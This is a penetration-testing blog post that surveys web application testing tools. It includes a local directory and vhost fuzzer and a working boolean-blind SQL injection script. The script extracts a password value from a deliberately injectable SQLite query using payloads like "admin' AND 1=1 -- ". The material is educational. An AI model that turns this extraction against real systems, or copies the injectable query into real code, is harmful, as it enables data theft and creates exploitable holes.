Penetration testing is an extremely dynamic field. There is very little standardization in the tools, processes, and techniques that different organizations leverage when performing testing. Web application penetration testing is no different, so we’re going to cover some of the most common web application penetration testing tools in our toolkit.
This disparity in tools is probably due to the different goals of test teams (traditional pen test to red team to bug bounty), the constantly changing nature of security, and the lack of an international standard in penetration testing processes (there are a ton of different, individual standards instead). Even an individual penetration tester’s background and preferences play into the tooling they are going to use as part of an assessment: Do they have a budget to buy top tier tools (think Cobalt Strike or AppScan) or are they leveraging open source? Do they have a background in programming/scripting and want to write their own, or do they need to take what they can get from GitHub?
In any case, when it comes to web application penetration testing tools, there are many different options/approaches that are equally valid and will vary based on the details of your target. Ultimately, the tool does not make the tester. But it is helpful to understand the types of tools that are out there if you are a tester yourself. It’s also good if you are engaging someone to perform a web application penetration test to understand what that testing organization is going to use against your application. Let’s run through a few:
Burp Suite Professional
This is almost always numero uno and is definitely my primary web application penetration testing tool. Burp Suite (with a Professional license) is one of the most useful and versatile tools in a web application penetration tester’s toolkit, and I don’t know many people that don’t feature it as their main tool when it comes to applications. Burp Suite is an intercepting proxy and vulnerability scanner that can do just about anything you need to do during a penetration test, all through one interface. It can perform content discovery, directory brute forcing, manual request manipulation, automated fuzzing, password attacks, etc. On top of that, it’s extremely extensible: the BApp Store is an entire third-party extension store dedicated to more niche penetration testing add-ons, and Burp supports the development of custom extensions for specific scenarios.
I know I just said that Burp Suite can do almost anything, but there are still other tools that are useful in tandem, either to provide a different perspective or to run more efficiently. dirsearch is an open source option for content discovery using directory brute forcing. I personally prefer this over Dirb, DirBuster, and Gobuster due to its ease-of-use and clear/concise output. All directory brute forcing options are extremely similar in functionality, so it mostly comes down to your chosen wordlists and configuration options: which extensions to append, whether to recurse into discovered directories, and how to filter responses. That last one matters more than it sounds, because many applications answer unknown paths with an HTTP 200 “not found” page (a soft 404), so filtering on status code alone hides nothing and you end up filtering on response size or content instead.
Similarly, wfuzz is a fuzzing tool that provides a little more flexibility beyond the content discovery options I just listed. It lets you run multiple wordlists and specify custom insertion locations (the FUZZ keyword, then FUZ2Z, FUZ3Z, and so on) anywhere in the request, which allows you to do things like fuzz headers, extensions, sub-domains, virtual hosts (by fuzzing the Host header), etc. The configuration options have a slightly steeper learning curve, but it’s well worth it.
Nikto is an open source web server vulnerability scanner that can quickly identify low-hanging vulnerabilities and items of interest during a web application penetration test. Burp Suite now covers most of these vulnerabilities, but Nikto continues to perform well at identifying indicators of more niche vulnerabilities by checking for specific fingerprints associated with them. This can often lead to a critical issue that might otherwise have gone unnoticed. Two caveats: Nikto is loud (it sends thousands of requests, so don’t expect it to go unnoticed by the target’s monitoring), and its findings are indicators rather than confirmed vulnerabilities, so each one still needs manual verification before it goes in a report.
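To make the content discovery and fuzzing points concrete, here is an added example that is not part of the original post and is not code from dirsearch or wfuzz: a minimal wfuzz-style fuzzer in Python. It replaces FUZZ/FUZ2Z placeholders in the path or in any header from one or more wordlists, filters responses by status code and size the way wfuzz’s --hc/--hh options do, and measures the soft-404 size first so that “200 but not found” pages drop out. It runs against a constructed throw-away HTTP server on loopback (the hidden paths and the hypothetical dev.example.test virtual host are made up), so it works offline.

```python
import itertools
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the target application (not a real site). It has a
# few hidden resources, one extra virtual host, and answers every other path
# with HTTP 200 "not found" (a soft 404), which defeats status-code-only filters.
HIDDEN_PATHS = {"/admin/": 200, "/backup.zip": 200, "/api/": 403}
VHOSTS = {"dev.example.test"}  # hypothetical hostname


class FakeApp(BaseHTTPRequestHandler):
    def do_GET(self):
        host = self.headers.get("Host", "").split(":")[0]
        if host in VHOSTS:
            status, body = 200, b"dev site"
        elif self.path in HIDDEN_PATHS:
            status, body = HIDDEN_PATHS[self.path], b"x" * 40
        else:
            status, body = 200, b"Page not found, sorry"  # soft 404
        self.send_response(status)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the server quiet
        pass


def start_server():
    srv = HTTPServer(("127.0.0.1", 0), FakeApp)  # port 0: pick any free port
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_port}"


# Ignore any proxy configured in the environment so loopback requests go direct.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def request(url, headers):
    """Return (status, body length) for one GET; 4xx/5xx are data, not errors."""
    req = urllib.request.Request(url, headers=headers)
    try:
        with OPENER.open(req, timeout=5) as resp:
            return resp.status, len(resp.read())
    except urllib.error.HTTPError as err:
        return err.code, len(err.read())


def fuzz(url_tmpl, header_tmpl, wordlists, hide_codes=(), hide_size=None, mode="product"):
    """wfuzz-style fuzzing: FUZZ, FUZ2Z, ... in the URL or any header value are
    replaced from the matching wordlist. mode="product" tries every combination
    (wfuzz's default iterator); mode="zip" pairs the lists element-wise.
    Responses whose status is in hide_codes or whose size equals hide_size are
    dropped, the same idea as wfuzz's --hc / --hh filters."""
    combos = itertools.product(*wordlists) if mode == "product" else zip(*wordlists)
    hits = []
    for words in combos:
        url, headers = url_tmpl, dict(header_tmpl)
        for i, word in enumerate(words):
            key = "FUZZ" if i == 0 else f"FUZ{i + 1}Z"
            url = url.replace(key, word)
            headers = {k: v.replace(key, word) for k, v in headers.items()}
        status, size = request(url, headers)
        if status in hide_codes or size == hide_size:
            continue
        hits.append((url, headers.get("Host"), status, size))
    return hits


def discover_content(base, words, exts):
    """dirsearch-style discovery: each word is tried bare, as a directory and
    with each extension; the soft-404 size is measured first and filtered out."""
    _, soft404 = request(base + "/zz-this-should-not-exist", {})
    candidates = [c for w in words for c in (w, w + "/", *[f"{w}.{e}" for e in exts])]
    hits = fuzz(base + "/FUZZ", {}, [candidates], hide_codes={404}, hide_size=soft404)
    return sorted(url[len(base):] for url, _, _, _ in hits)


def discover_vhosts(base, domain, words):
    """Virtual host discovery: fuzz the Host header instead of the path."""
    _, baseline = request(base + "/", {"Host": "zz-baseline." + domain})
    hits = fuzz(base + "/", {"Host": "FUZZ." + domain}, [words], hide_size=baseline)
    return sorted(host for _, host, _, _ in hits)


def demo():
    srv, base = start_server()
    try:
        paths = discover_content(base, ["admin", "backup", "api", "login"], ["zip", "php"])
        hosts = discover_vhosts(base, "example.test", ["www", "dev", "staging"])
        # Two insertion points, name x extension, like wfuzz's URL/FUZZ.FUZ2Z with two -z lists.
        _, soft404 = request(base + "/zz-this-should-not-exist", {})
        combos = fuzz(base + "/FUZZ.FUZ2Z", {}, [["admin", "backup"], ["zip", "php"]], hide_size=soft404)
        return paths, hosts, sorted(url[len(base):] for url, _, _, _ in combos)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    found_paths, found_hosts, found_combos = demo()
    print("content:", found_paths)        # ['/admin/', '/api/', '/backup.zip']
    print("vhosts:", found_hosts)         # ['dev.example.test']
    print("name.ext combos:", found_combos)  # ['/backup.zip']
```

Note that without the size filter every candidate path would show up as a 200 “hit”, which is exactly the failure mode you run into on real applications with custom error pages; the same baseline trick works for vhost discovery, where the default site’s response is the thing to hide.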
While most of the other web application penetration testing tools we’ve mentioned so far are centered around vulnerability discovery, sqlmap generally comes in handy more during the exploitation phase. While it certainly can be used to identify SQL injection vulnerabilities from scratch, I use it for exploiting a SQL injection issue I’ve already identified and confirmed manually. As a free tool, it is extremely stable and feature rich, providing you with a vast number of options for exploitation. With a single command, you can dump an entire database from any of the common injection types (boolean-based blind, time-based blind, error-based, UNION-based, or stacked queries) against any of the major back-end relational databases. Going further to an operating system shell is possible too, but only when the database type, the injection type, and the privileges of the application’s database account allow it, so treat that as something to test for rather than a given.
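The following is an added example, not part of the original post and not sqlmap’s own code, showing the boolean-based blind technique that sqlmap automates once you have confirmed an injection point by hand. The target is a constructed in-memory SQLite database with a deliberately injectable username lookup (the table, the users and the “hash” value are made up). The app leaks only one bit per request (row found or not), and the extraction routine turns that bit into the admin’s stored value character by character, binary-searching each code point. SQLite’s unicode() is used for the code point; on other databases the function name differs, which is part of what sqlmap adapts per DBMS. The parameterized version of the same lookup is included so you can see the probe fail against it.

```python
import sqlite3

# Constructed target: an in-memory SQLite database standing in for the
# application's back end. All data here is made up for the example.
db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
    INSERT INTO users(username, password_hash) VALUES ('admin', 'b4d$ecret');
    INSERT INTO users(username, password_hash) VALUES ('guest', 'guest');
""")

REQUESTS = 0  # how many "requests" the attack needed, the number sqlmap reports


def user_exists_vulnerable(username):
    """Deliberately vulnerable: user input concatenated straight into SQL.
    Returns only whether a row matched, which is a boolean-blind oracle."""
    global REQUESTS
    REQUESTS += 1
    sql = f"SELECT id FROM users WHERE username = '{username}'"
    return db.execute(sql).fetchone() is not None


def user_exists_fixed(username):
    """Same lookup with a bound parameter: the input can never change the query."""
    global REQUESTS
    REQUESTS += 1
    sql = "SELECT id FROM users WHERE username = ?"
    return db.execute(sql, (username,)).fetchone() is not None


def looks_injectable(probe):
    """The manual confirmation step: a true and a false condition must produce
    different responses. Against the fixed function both come back False."""
    true_case = probe("admin' AND 1=1 -- ")
    false_case = probe("admin' AND 1=2 -- ")
    return bool(true_case and not false_case)


def oracle(condition):
    """Ask the app one yes/no question by injecting it into the WHERE clause.
    The trailing '-- ' comments out the original closing quote."""
    return user_exists_vulnerable(f"admin' AND ({condition}) -- ")


def extract_blind(column, table, where):
    """Recover one value with boolean-based blind injection: first learn its
    length, then binary-search the code point of every character (printable
    ASCII, 32..126), which costs about 7 requests per character instead of ~95."""
    length = 0
    while oracle(f"(SELECT length({column}) FROM {table} WHERE {where}) > {length}"):
        length += 1
    recovered = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            # "is the character's code point greater than mid?"
            if oracle(f"(SELECT unicode(substr({column}, {pos}, 1)) "
                      f"FROM {table} WHERE {where}) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    print("vulnerable endpoint injectable:", looks_injectable(user_exists_vulnerable))  # True
    print("fixed endpoint injectable:     ", looks_injectable(user_exists_fixed))       # False
    REQUESTS = 0
    value = extract_blind("password_hash", "users", "username = 'admin'")
    print(f"recovered {value!r} in {REQUESTS} requests")  # recovered 'b4d$ecret'
```

This is the slowest injection type, which is why sqlmap prefers UNION or error-based techniques when the application allows them and falls back to boolean or time-based blind only when it must; the request count above is also a reminder of why you confirm the injection manually first rather than pointing the tool at every parameter.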
While this is certainly not an exhaustive list, as you can imagine, this should provide a really solid understanding of some of the most common/useful web application penetration testing tools you’ll see used during an assessment. Custom scripts and other tools almost always come into play, as well, but their usage is highly dependent on the specific target architecture or more niche vulnerabilities. If you’d like to understand more about how we conduct web application penetration testing, check out our high-level methodology or reach out if you’d like to hear more about the benefits of web application penetration testing.